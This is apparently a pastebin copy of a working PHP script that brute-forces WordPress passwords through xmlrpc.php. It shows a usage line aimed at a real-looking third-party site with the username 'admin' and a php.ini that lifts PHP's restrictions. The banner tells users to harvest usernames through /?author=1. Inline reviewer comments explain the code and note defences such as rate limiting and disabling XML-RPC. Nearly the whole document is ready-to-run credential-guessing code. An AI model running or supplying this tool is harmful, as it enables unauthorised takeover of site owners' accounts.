
wordpress xmlrpc bruteforce

a guest
May 31st, 2015
  1. Usage:
  2. [blackhat@fedora tmp]$ php -c ~/shellz/xmlrpcbrutewp/php.ini -f /tmp/brut.php admin /home/blackhat/Desktop/founds/1.txt http://verona.am/xmlrpc.php
  3.  
  4. $ cat ~/shellz/xmlrpcbrutewp/php.ini
  5. safe_mode = off
  6. open_basedir=
  7. disable_functions=
  8.  
  9.  
  10.  
  11. [blackhat@fedora ~]$ cat /tmp/brut.php
  12. <?php
  13. /*
  14.  
  15. Wordpress xmlrpc Bruteforce tool
  16. Coded by AkaStep

      Reviewer summary: command-line script that takes a username, a wordlist
      file and an xmlrpc.php URL, sends one wp.getUsersBlogs XML-RPC call per
      wordlist line, and stops at the first response that does not contain the
      text 'Incorrect username or password'.
      Seen from the server, this is a steady series of POST requests to
      xmlrpc.php from one client, each carrying a different password for the
      same account. Rate limiting on that endpoint, or turning XML-RPC off
      where it is not used, addresses that pattern.
  17. */
  18.  
      // Suppress all PHP diagnostics, raise the memory limit to 6000M and
      // remove the execution time limit.
  19. error_reporting(0);
  20. ini_set('memory_limit', '6000M');
  21. set_time_limit(0);
  22.  
      // Usage line and banner. chr(27) is ESC, so chr(27)."[42m" and
      // chr(27)."[0m" are ANSI terminal colour sequences (set / reset).
      // NOTE(review): the banner text is not English; its last line refers to
      // the /?author=1 URL, presumably as a source of a valid username -
      // confirm. Sites that do not need author-archive lookups can restrict
      // them.
  23. $usage='php -f script.php username luget.txt http://domain.adi/xmlrpc.php';
  24. $banner=chr(27) ."[42m" . str_repeat('#',60) . PHP_EOL . ' **************** WORDPRESS XMLRPC BRUTEFORCE TOOL **************' . PHP_EOL .
  25. ' ********************* Istifade qaydasi ********************'.
  26. PHP_EOL .$usage . PHP_EOL .
  27. ' ****************************************************'. PHP_EOL .
  28. 'Hint: VALID ISTIFADECI ADI: http://domain.adi/?author=1 GRAB ET ' . chr(27) . "[0m" .PHP_EOL ;
  29.  
      // Positional arguments: username, wordlist path, target URL. They are
      // read before the argument-count check below; with error_reporting(0)
      // a missing argument produces no visible notice.
  30. $uname=$argv[1];
  31.  
  32. $luget=$argv[2];
  33.  
  34. $hedef=$argv[3];
  35.  
      // Fewer than three arguments: print the banner and exit.
  36. if(count($argv) < 4){ die(PHP_EOL . $banner . PHP_EOL);}
  37.  
  38. echo $banner;
  39.  
      // file() loads the whole wordlist into memory as an array of lines;
      // exit with a message if it returns a falsy value.
  40. $luget=file($luget) or die('Luget Fayli Aca bilmirem!');
  41.  
  42.  
      // Attempt counter; the first $i++ turns NULL into 1.
  43. $i=NULL;
      // One HTTP request per wordlist line.
  44. foreach($luget as $pass)
  45. {
  46.  
  47. $i++;
  48.  
      // A fresh cURL handle is created for every attempt.
  49. $ch = curl_init();
      // Request settings: POST to the target URL, response returned as a
      // string, 5 second timeout. The body is an XML-RPC methodCall for
      // wp.getUsersBlogs with the username and the current wordlist line
      // inserted as the two string parameters.
      // The User-Agent is a fixed literal, so traffic from this exact script
      // can carry it verbatim into access logs. It is a single constant and a
      // weak indicator on its own; request volume against xmlrpc.php is the
      // sturdier signal.
  50. $curlConfig = array(
  51. CURLOPT_URL => $hedef,
  52. CURLOPT_POST => true,
  53. CURLOPT_RETURNTRANSFER => true,
  54. CURLOPT_TIMEOUT => 5,
  55. CURLOPT_USERAGENT => 'MSIE 8 GECKO 9 BRUTEFORCE TRY MOZILLA GECKO BLAH LINUX PENTEST',
  56. CURLOPT_POSTFIELDS => '<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>
  57. <string>' . $uname . '</string></value></param>
  58. <param><value><string>' . $pass . '</string></value></param></params>
  59. </methodCall>');
  60.  
  61.  
  62. curl_setopt_array($ch, $curlConfig);
  63. $result = curl_exec($ch);
  64.  
      // Split the response body on PHP_EOL and read fixed line positions
      // (index 11 here, index 7 further down) as the server's message text.
      // NOTE(review): assumes the response is laid out line by line in a
      // particular way - not verifiable from this file.
  65. $massiv=explode(PHP_EOL,$result);
  66.  
  67. $result0=str_ireplace(array('<value><string>',
  68. '</string></value>'),'',(string)$massiv[11]);
  69.  
  70.  
  71. //echo var_dump($massiv);
  72.  
  73.  
  74.  
      // Every tenth attempt (i = 1, 11, 21, ...) print the target URL with
      // every character outside A-Z, a-z, 0-9, '.', ':' and '/' removed.
  75. if($i % 10==1) {
  76.  
  77. echo chr(27) . "[43m" . ' HEDEF => ' . preg_replace('/[^A-Za-z0-9\.\\:\\/]/i','',(string)$hedef). chr(27) . "[0m" .PHP_EOL;
  78. }
  79.  
  80.  
      // Any response that lacks the text 'Incorrect username or password'
      // (case-insensitive substring test) is treated as a hit: the script
      // prints the username, the wordlist line and a letters-only extract of
      // response line 7, then exits through die().
  81. if(!stristr($result,'Incorrect username or password')) die(PHP_EOL .chr(27) . "[42m" . '=======> TAPILDI! Username: ' . $uname . ' PAROL => ' . $pass . ' ==> Saytdan cavab:[ ' .
  82. preg_replace('/[^A-Za-z]/i','',str_ireplace(array('<member><name>',
  83. '</name>','<value><boolean>','</boolean></value></member>'),'',(string)$massiv[7])) . ' ] ' . ' <======= ' . PHP_EOL . 'HEDEF: ' . $hedef. chr(27) . "[0m" .PHP_EOL);
  84.  
  85.  
      // Otherwise print the attempt number, username, trimmed wordlist line
      // and the extracted server message, wrapped in the "[41m" colour
      // sequence.
  86. echo chr(27) . "[41m" . '[ ' . $i . ' ] USERNAME: ' . $uname . ' PAROL QISMINDE: ' . trim($pass) . ' ==> Saytdan cavab:[ ' . trim($result0) . ' ] ' . chr(27) . "[0m" . PHP_EOL ;
  87.  
  88.  
      // Release the handle; not reached on the die() path above.
  89. curl_close($ch);
  90.  
  91. }
  92.  
      // Drop the leftover loop variable.
  93. unset($pass);
  94.  
  95.  
  96.  
  97. ?>